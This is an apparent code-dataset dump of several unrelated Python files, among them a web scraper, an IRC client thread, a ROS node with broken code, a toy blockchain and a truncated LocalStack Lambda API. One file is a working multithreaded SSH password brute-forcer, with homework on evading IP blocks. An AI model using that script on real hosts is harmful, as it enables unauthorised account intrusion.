source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
kuanShopApp_spider.py | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 25 04:26:09 2020
酷安应用商店应用数据爬取
@author: luohenyueji
"""
import requests
import queue
import threading
import re
from lxml import etree
import csv
from copy import deepcopy
class KuAn(object):
def __init__(self, category, page):
if category not in ['apk', 'game']:
raise ValueError('category参数不在范围内')
# 类别
self.category = category
self.page = page
self.header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'}
# 写入csv头
self.csv_header = ['应用名称', '下载链接']
with open('{}.csv'.format(self.category), 'w', newline='', encoding='utf-8-sig') as f:
csv_file = csv.writer(f)
csv_file.writerow(self.csv_header)
# url
self.url = 'https://www.coolapk.com'
self.base_url = 'https://www.coolapk.com/{}'.format(category)
# 队列
# 要爬取的网页
self.page_url_queue = queue.Queue()
# 单个应用网页地址
self.detail_url_queue = queue.Queue()
self.save_queue = queue.Queue()
# ----- 获得单个应用的页面地址
def get_detail_url_fun(self):
while True:
# 取出页面
page_url = self.page_url_queue.get()
req = requests.get(url=page_url, headers=self.header)
if req.status_code == 200:
req.encoding = req.apparent_encoding
html = etree.HTML(req.text)
# 获得链接
if self.category == 'apk':
path = html.xpath('//*[@class="app_left_list"]/a/@href')
elif self.category == 'game':
path = html.xpath('//*[@class="game_left_three"]/a/@href')
for _ in path:
# 单个应用网页地址
detail_url = self.url + _
print('正在获取详情链接:', detail_url)
# 保存数据
self.detail_url_queue.put(deepcopy(detail_url))
# 告诉 page_url_queue.join()任务完成
# 参考 https://blog.csdn.net/qq_43577241/article/details/104442854
self.page_url_queue.task_done()
if self.page_url_queue.empty():
break
# ----- 获得单个应用的下载地址
def get_download_url_fun(self):
while True:
detail_url = self.detail_url_queue.get()
req = requests.get(url=detail_url, headers=self.header)
if req.status_code == 200:
req.encoding = 'utf-8'
# 下载链接获取需要仔细寻找,可能无法直接下载
url_reg = "'(.*?)&from=from-web"
name_reg = '<p class="detail_app_title">(.*?)<'
# 获取下载链接
download_url = re.findall(url_reg, req.text)[0] + '&from=from-web'
# 获取应用名字
name = re.findall(name_reg, req.text)[0]
data = {'name': name, 'url': download_url}
print('获取到数据:', data)
self.save_queue.put(data)
self.detail_url_queue.task_done()
# ----- 保存数据
def save_data_fun(self):
while True:
data = self.save_queue.get()
name = data.get('name')
url = data.get('url')
with open('{}.csv'.format(self.category), 'a+', newline='', encoding='utf-8-sig') as f:
csv_file = csv.writer(f)
csv_file.writerow([name, url])
self.save_queue.task_done()
def run(self):
for _ in range(1, self.page + 1):
# 设定网页
page_url = self.base_url + '?p={}'.format(_)
print('下发页面url', page_url)
# 要爬取的网页
self.page_url_queue.put(page_url)
self.get_detail_url_fun()
thread_list = []
# 两个线程获得单个应用的页面地址
for _ in range(2):
get_detail_url = threading.Thread(target=self.get_detail_url_fun)
thread_list.append(get_detail_url)
# 五个线程获得单个应用的下载地址
for _ in range(5):
get_download_url = threading.Thread(target=self.get_download_url_fun)
thread_list.append(get_download_url)
# 两个线程保存单个应用的下载地址
for _ in range(2):
save_data = threading.Thread(target=self.save_data_fun)
thread_list.append(save_data)
for t in thread_list:
# 设置为守护进程 主进程中的代码执行完毕之后,子进程自动结束
t.setDaemon(True)
t.start()
for q in [self.page_url_queue, self.detail_url_queue, self.save_queue]:
# 直到 queue中的数据均被删除或者处理
# 参考 https://blog.csdn.net/dashoumeixi/article/details/80946509
q.join()
print('爬取完成,结束')
if __name__ == '__main__':
KuAn(category='game', page=2).run()
|
ircthread.py | #!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
self.irc_prefix = options.get('irc_prefix')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
if not self.irc_prefix:
self.irc_prefix = 'L_'
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = self.irc_prefix + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-lux")
def on_join(self, connection, event):
m = re.match("("+self.irc_prefix+".*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("("+self.irc_prefix+"..*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith(self.irc_prefix):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
face-back.py | #!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs.msg import Segment, SegmentList, Vector2D
from geometry_msgs.msg import Point
import numpy as np
import threading
#from PIL import Image as pimg
#import jpeg4py as jpeg
class FaceLulalaAlphaduck(object):
def __init__(self):
self.node_name = "face_lulala_alphaduck_node"
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
# Parameters
self.image_size = rospy.get_param('~img_size')
# Publishers
self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
# Verbose option
self.verbose = rospy.get_param('~verbose')
if self.verbose:
self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns rightaway
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# time_start = rospy.Time.now()
# time_start = event.last_real
# msg_age = time_start - image_msg.header.stamp
# rospy.loginfo("[LineDetector] image age: %s" %msg_age.to_sec())
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# with PIL Image
# image_cv = jpeg.JPEG(np.fromstring(image_msg.data, np.uint8)).decode()
# with libjpeg-turbo
# Convert from uncompressed image message
# image_cv = self.bridge.imgmsg_to_cv2(image_msg, "bgr8")
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.)
# Resize and crop image
hei_original = image_cv.shape[0]
wid_original = image_cv.shape[1]
if self.image_size[0]!=hei_original or self.image_size[1]!=wid_original:
# image_cv = cv2.GaussianBlur(image_cv, (5,5), 2)
image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]), interpolation=cv2.INTER_NEAREST)
image_cv = image_cv[self.top_cutoff:,:,:]
# White balancing
if self.flag_wb and self.flag_wb_ref:
self.wb.correctImg(image_cv)
# Set the image to be detected
self.detector.setImage(image_cv)
# Detect lines and normals
lines_white, normals_white = self.detector.detectLines('white')
lines_yellow, normals_yellow = self.detector.detectLines('yellow')
lines_red, normals_red = self.detector.detectLines('red')
# Draw lines and normals
self.detector.drawLines(lines_white, (0,0,0))
self.detector.drawLines(lines_yellow, (255,0,0))
self.detector.drawLines(lines_red, (0,255,0))
#self.detector.drawNormals(lines_white, normals_white)
#self.detector.drawNormals(lines_yellow, normals_yellow)
#self.detector.drawNormals(lines_red, normals_red)
# SegmentList constructor
segmentList = SegmentList()
segmentList.header.stamp = image_msg.header.stamp
# Convert to normalized pixel coordinates, and add segments to segmentList
arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
if len(lines_white)>0:
lines_normalized_white = ((lines_white + arr_cutoff) * arr_ratio)
segmentList.segments.extend(self.toSegmentMsg(lines_normalized_white, normals_white, Segment.WHITE))
if len(lines_yellow)>0:
lines_normalized_yellow = ((lines_yellow + arr_cutoff) * arr_ratio)
segmentList.segments.extend(self.toSegmentMsg(lines_normalized_yellow, normals_yellow, Segment.YELLOW))
if len(lines_red)>0:
lines_normalized_red = ((lines_red + arr_cutoff) * arr_ratio)
segmentList.segments.extend(self.toSegmentMsg(lines_normalized_red, normals_red, Segment.RED))
# Verbose
if self.verbose:
self.toc = rospy.get_time()
rospy.loginfo("[%s] Image processing time: %.3f ms" %(self.node_name, (self.toc-self.tic)*1000.0))
rospy.loginfo("[%s] Number of white segments = %d" %(self.node_name, len(lines_white)))
rospy.loginfo("[%s] number of yellow segments = %d" %(self.node_name, len(lines_yellow)))
rospy.loginfo("[%s] number of red segments = %d" %(self.node_name, len(lines_red)))
self.toc_pre = self.toc
# Publish segmentList
self.pub_lines.publish(segmentList)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent: %s" %(time_spent.to_sec()))
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(self.detector.getImage(), "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# time_spent = rospy.Time.now() - time_start
# rospy.loginfo("[LineDetectorNode] Spent on img: %s" %(time_spent.to_sec()))
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[LineDetectorNode] Shutdown.")
def toSegmentMsg(self, lines, normals, color):
segmentMsgList = []
for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
segment = Segment()
segment.color = color
segment.pixels_normalized[0].x = x1
segment.pixels_normalized[0].y = y1
segment.pixels_normalized[1].x = x2
segment.pixels_normalized[1].y = y2
segment.normal.x = norm_x
segment.normal.y = norm_y
segmentMsgList.append(segment)
return segmentMsgList
if __name__ == '__main__':
rospy.init_node('line_detector',anonymous=False)
line_detector_node = LineDetectorNode()
rospy.on_shutdown(line_detector_node.onShutdown)
rospy.spin()
|
runner.py | import queue, threading
import datetime
class Stats:
d = {}
def __repr__(self):
return str(self.d)
def __str__(self):
return '\n'.join(['\t{k}: {v}'.format(k=k, v=v) for k, v in self.d.items()])
def add(self, key):
if self.d.get(key) is None:
self.d[key] = 1
else:
self.d[key] += 1
return
def put(self, key, value):
self.d[key] = value
return
class TaskRunner:
def __init__(self, producer_threads=1, consumer_threads=2, q_delay=-1):
self.producer_threads = producer_threads
self.consumer_threads = consumer_threads
self.q = queue.Queue()
self.q_delay = q_delay
self.stats = Stats()
def build_queue(self):
raise NotImplementedError
return
def do_task(self, task):
raise NotImplementedError
return
def add_task(self, task):
self.q.put(task)
return
def consumer(self):
while not self.q.empty():
task = self.q.get()
self.do_task(task)
self.q.task_done()
return
def start_consumers(self):
for i in range(self.consumer_threads):
thread = threading.Thread(target=self.consumer)
thread.start()
return
def run(self):
self.build_queue()
print('Queue has {size} tasks'.format(size=self.q.qsize()))
start = datetime.datetime.now()
self.start_consumers()
self.q.join()
end = datetime.datetime.now()
duration = int(1000 * (end - start).total_seconds())
self.stats.put('duration', '{ms}ms'.format(ms=duration))
return self.stats |
run.py | import cli_app.run_agent as agent
import cli_app.run_server as server
import threading
import time
def run():
server.server_run()
agent.agent_run()
def main():
server_thread = threading.Thread(target=server.server_run)
server_thread.start()
agent_thread = threading.Thread(target=agent.agent_run)
agent_thread.start()
server_thread.join()
agent_thread.join()
if __name__ == '__main__':
main()
# run()
time.sleep(50)
|
rse.py | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abacus-RSE is a daemon to update RSE counters.
"""
import logging
import os
import socket
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging, formatted_logger
from rucio.common.utils import get_thread_with_periodic_running_function, daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rse_counter import get_updated_rse_counters, update_rse_counter, fill_rse_counter_history_table
graceful_stop = threading.Event()
def rse_update(once=False, sleep_time=10):
"""
Main loop to check and update the RSE Counters.
"""
# Make an initial heartbeat so that all abacus-rse daemons have the correct worker number on the next try
executable = 'abacus-rse'
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
while not graceful_stop.is_set():
try:
# Heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
prepend_str = 'rse_update[%i/%i] : ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prepend_str + '%s')
# Select a bunch of rses for to update for this worker
start = time.time() # NOQA
rse_ids = get_updated_rse_counters(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'])
logger(logging.DEBUG, 'Index query time %f size=%d' % (time.time() - start, len(rse_ids)))
# If the list is empty, sent the worker to sleep
if not rse_ids and not once:
logger(logging.INFO, 'did not get any work')
daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
else:
for rse_id in rse_ids:
if graceful_stop.is_set():
break
start_time = time.time()
update_rse_counter(rse_id=rse_id)
logger(logging.DEBUG, 'update of rse "%s" took %f' % (rse_id, time.time() - start_time))
except Exception:
logger(logging.ERROR, traceback.format_exc())
if once:
break
logging.info('rse_update: graceful stop requested')
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
logging.info('rse_update: graceful stop done')
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False, sleep_time=10):
"""
Starts up the Abacus-RSE threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
executable = 'abacus-rse'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
logging.info('main: executing one iteration only')
rse_update(once)
else:
logging.info('main: starting threads')
threads = [threading.Thread(target=rse_update, kwargs={'once': once, 'sleep_time': sleep_time}) for i in
range(0, threads)]
if fill_history_table:
threads.append(get_thread_with_periodic_running_function(3600, fill_rse_counter_history_table, graceful_stop))
[t.start() for t in threads]
logging.info('main: waiting for interrupts')
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
profileserver.py | #literal #!/usr/bin/python
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import SimpleHTTPServer
import SocketServer
import socket
import threading
import os
import sys
import shutil
from datetime import datetime
SCRIPT_DIR = os.path.abspath(os.path.realpath(os.path.dirname(sys.argv[0])))
sys.path.insert(0, SCRIPT_DIR)
from automation import Automation
from automationutils import getDebuggerInfo, addCommonOptions
PORT = 8888
PROFILE_DIRECTORY = os.path.abspath(os.path.join(SCRIPT_DIR, "./pgoprofile"))
MOZ_JAR_LOG_DIR = os.path.abspath(os.getenv("JARLOG_DIR"))
os.chdir(SCRIPT_DIR)
class EasyServer(SocketServer.TCPServer):
allow_reuse_address = True
if __name__ == '__main__':
from optparse import OptionParser
automation = Automation()
parser = OptionParser()
addCommonOptions(parser)
options, args = parser.parse_args()
debuggerInfo = getDebuggerInfo(".", options.debugger, options.debuggerArgs,
options.debuggerInteractive)
httpd = EasyServer(("", PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
t = threading.Thread(target=httpd.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
automation.setServerInfo("localhost", PORT)
automation.initializeProfile(PROFILE_DIRECTORY)
browserEnv = automation.environment()
browserEnv["XPCOM_DEBUG_BREAK"] = "warn"
browserEnv["MOZ_JAR_LOG_DIR"] = MOZ_JAR_LOG_DIR
url = "http://localhost:%d/index.html" % PORT
appPath = os.path.join(SCRIPT_DIR, automation.DEFAULT_APP)
status = automation.runApp(url, browserEnv, appPath, PROFILE_DIRECTORY, {},
debuggerInfo=debuggerInfo,
# the profiling HTML doesn't output anything,
# so let's just run this without a timeout
timeout = None)
sys.exit(status)
|
2.051sshBrute.py | from pexpect import pxssh
from threading import *
import optparse
import time
'''
This code we need learning pxssh from pexpect
Docstring:
----------
1. first,we create maxConnection to set max number of threads. This example we set 5
2. we set global variable Found and Fails
Found: check any thread finds the correct password, if found, Found = True else false
Fails: Number of failed in "timeout Error"
3. we try connect with target ssh use password list,if find error between "read_nonblocking" and
"synchronize with original prompt" then, we need set time.sleep(1) and try again !
Note:
-----
1. we threading code write for loop, that means:
when we have many many password,
If the previous thread finds it,
then the following thread does not need to look up.
2.if thread have so many Fails(this example is 5),then exit and
we need check target computer or yourself computer.
'''
maxConnection = 5
connection_lock = BoundedSemaphore(value=maxConnection)
Found = False
Fails = 0
def connect(host, user, password):
'''
:param host: target host
:param user: target user
:param password: target passwrod
:return: None
'''
global Found, Fails
try:
s = pxssh.pxssh() # create an instance
s.login(host, user, password) # login
print '[+] Password Found: ' + password
Found = True
except Exception as e:
if 'read_nonblocking' in str(e):
print '[!] found read_nonblocking will be restart '
Fails += 1
time.sleep(1)
connect(host, user, password)
elif 'synchronize with original prompt' in str(e):
print '[!] found synchronize will be restart '
time.sleep(1)
connect(host, user, password)
def main():
'''
Start run function
'''
parser = optparse.OptionParser('usage%prog ' +
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-u', dest='user', type='string', help='specify target user')
parser.add_option('-F', dest='passwordList', type='string', help='specify password list')
(options, args) = parser.parse_args()
host = options.tgtHost
passwordList = options.passwordList
user = options.user
if (host is None) or (passwordList is None) or (user is None):
print parser.usage
exit(0)
passwordList = passwordList.split(',')
for password in passwordList:
if Found:
print '[*] Exiting: Password Found'
exit(0)
if Fails > 5:
print '[!] Exiting: Too many socket timeout'
exit(0)
t = Thread(target=connect, args=(host, user, password))
t.start()
print '[-] Testing password {} with {}'.format(password, t.getName())
if __name__ == '__main__':
main()
'''
HomeWork:
0. read this code,
1. add "change ip proxy function" if ip was blocked. means add "ip error" in except
2. alter password to passFile,means read password from file.you can use following code:
["".join(x) for x in itertools.product("0123456789", repeat=6)])
friendly reminder:
you need use generator in Python, else your computer will be die! :)
Good Luck ~
'''
|
blockchain.py | #!/usr/bin/python3.6
from miner import Miner
import ast
from multiprocessing import Process, Manager
import socket
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 65432 # Port to listen on (non-privileged ports are > 1023)
DIFFICULTY = 1 # Number of zeroes at the beginning of a new hash
GENESIS_BLOCK = {
"hash": "0",
"car": {
"id": "GENESIS BLOCK"
}
}
def main():
# initialize blockchain by adding the genesis block
# and create a file where all blocks will be appended
blockchain = [
GENESIS_BLOCK
]
print_blockchain(blockchain)
# create a server which simulates all blockchain miners
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
while True:
conn, addr = s.accept()
with conn:
print('Connected by', addr)
data = conn.recv(2048)
print("A new block received: ", data.decode())
# in python3 the string must be encoded
conn.sendall("hello from server side".encode())
msg = ast.literal_eval(data.decode())
try:
if msg['request']:
# for purposes of this demo we need to query the
# blockchain
answer(msg, blockchain)
except KeyError:
# a new block was sent to the blockchain network and is
# gonna be send to each miner in the network
miners(msg, blockchain)
def miners(block, blockchain):
"""Creates miners as independent processes and if a new block is
validated it's added to the blockchain.
:type block: dict
:type blockchain: list
"""
# create a shared variable and initialize it
# the var is used for communication between processes (miners), when one
# of them finds the hash of a block, the others will validate the block
new_block = Manager().dict()
new_block["block"] = None
new_block["validated"] = None
# in order to simplify this demo, miners will not communicate over p2p,
# network but they will be simulated by independent processes
# let's create 3 miners which will compete in finding a hash
miners_lst = []
for i in range(3):
miners_lst.append(Miner(i, block, blockchain, DIFFICULTY, new_block))
# run each miner independently
jobs = []
for miner in miners_lst:
p = Process(target=miner.mine)
jobs.append(p)
p.start()
# join processes
for p in jobs:
# NOTE: the processes will be joined here, which means processes which
# got earlier to this point will wait for the rest of them
# ^^ above said, we'll wait until all processes validate the block,
# if any of them rejects it, the block will not be put into the
# blockchain in the next step
p.join()
# check if others have validated the block
if new_block["validated"]:
# add the block to the blockchain
blockchain.append(new_block["block"].get_block_obj(True))
# TODO nice print so that it's more readable during presentation
print_blockchain(blockchain)
else:
print("The block has been rejected!")
def print_blockchain(blockchain):
print("\n")
print("BLOCKCHAIN CONTENT")
for block in blockchain:
print("\n")
print(block)
def answer(msg, blockchain):
print("\n")
if msg["request"] == "history":
for block in blockchain:
try:
block_car = ast.literal_eval(block['car'])
if block_car['id'] == msg['car_id']:
print("\n")
print(block)
except ValueError:
# it was the genesis block
pass
if __name__ == '__main__':
main()
|
lambda_api.py | from __future__ import print_function
import os
import re
import sys
import json
import uuid
import time
import traceback
import logging
import base64
import threading
import imp
import glob
import subprocess
from io import BytesIO
from datetime import datetime
from multiprocessing import Process, Queue
from six import iteritems
from six.moves import cStringIO as StringIO
from flask import Flask, Response, jsonify, request, make_response
from localstack import config
from localstack.constants import *
from localstack.services import generic_proxy
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.common import *
from localstack.utils.aws import aws_stack
from localstack.utils.analytics import event_publisher
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
APP_NAME = 'lambda_api'
PATH_ROOT = '/2015-03-31'
ARCHIVE_FILE_PATTERN = '%s/lambda.handler.*.jar' % config.TMP_FOLDER
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SCRIPT_PATTERN = '%s/lambda_script_*.py' % config.TMP_FOLDER
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_DEFAULT_HANDLER = 'handler.handler'
LAMBDA_DEFAULT_RUNTIME = LAMBDA_RUNTIME_PYTHON27
LAMBDA_DEFAULT_STARTING_POSITION = 'LATEST'
LAMBDA_DEFAULT_TIMEOUT = 60
LAMBDA_ZIP_FILE_NAME = 'original_lambda_archive.zip'
# IP address of Docker bridge
DOCKER_BRIDGE_IP = '172.17.0.1'
app = Flask(APP_NAME)
# map ARN strings to lambda function objects
# TODO: create a single map for function details
lambda_arn_to_function = {}
lambda_arn_to_cwd = {}
lambda_arn_to_handler = {}
lambda_arn_to_runtime = {}
# list of event source mappings for the API
event_source_mappings = []
# logger
LOG = logging.getLogger(__name__)
# mutex for access to CWD
cwd_mutex = threading.Semaphore(1)
# whether to use Docker for execution
DO_USE_DOCKER = None
def cleanup():
global lambda_arn_to_function, event_source_mappings, lambda_arn_to_cwd, lambda_arn_to_handler
# reset the state
lambda_arn_to_function = {}
lambda_arn_to_cwd = {}
lambda_arn_to_handler = {}
lambda_arn_to_runtime = {}
event_source_mappings = []
def func_arn(function_name):
return aws_stack.lambda_function_arn(function_name)
def add_function_mapping(lambda_name, lambda_handler, lambda_cwd=None):
arn = func_arn(lambda_name)
lambda_arn_to_function[arn] = lambda_handler
lambda_arn_to_cwd[arn] = lambda_cwd
def add_event_source(function_name, source_arn):
mapping = {
"UUID": str(uuid.uuid4()),
"StateTransitionReason": "User action",
"LastModified": float(time.mktime(datetime.utcnow().timetuple())),
"BatchSize": 100,
"State": "Enabled",
"FunctionArn": func_arn(function_name),
"EventSourceArn": source_arn,
"LastProcessingResult": "OK",
"StartingPosition": LAMBDA_DEFAULT_STARTING_POSITION
}
event_source_mappings.append(mapping)
return mapping
def update_event_source(uuid_value, function_name, enabled, batch_size):
for m in event_source_mappings:
if uuid_value == m['UUID']:
if function_name:
m['FunctionArn'] = func_arn(function_name)
m['BatchSize'] = batch_size
m['State'] = enabled and 'Enabled' or 'Disabled'
m['LastModified'] = float(time.mktime(datetime.utcnow().timetuple()))
return m
return {}
def delete_event_source(uuid_value):
for i, m in enumerate(event_source_mappings):
if uuid_value == m['uuid']:
return event_source_mappings.pop(i)
return {}
def use_docker():
global DO_USE_DOCKER
if DO_USE_DOCKER is None:
DO_USE_DOCKER = False
if config.LAMBDA_EXECUTOR == 'docker':
try:
run('docker images', print_error=False)
# run('ping -c 1 -t 1 %s' % DOCKER_BRIDGE_IP, print_error=False)
DO_USE_DOCKER = True
except Exception as e:
pass
return DO_USE_DOCKER
def process_apigateway_invocation(func_arn, path, payload, headers={}, path_params={}):
try:
lambda_function = lambda_arn_to_function[func_arn]
event = {
'path': path,
'headers': dict(headers),
'pathParameters': dict(path_params),
'body': payload,
'isBase64Encoded': False,
'resource': 'TODO',
'httpMethod': 'TODO',
'queryStringParameters': {}, # TODO
'stageVariables': {} # TODO
}
return run_lambda(lambda_function, event=event, context={}, func_arn=func_arn)
except Exception as e:
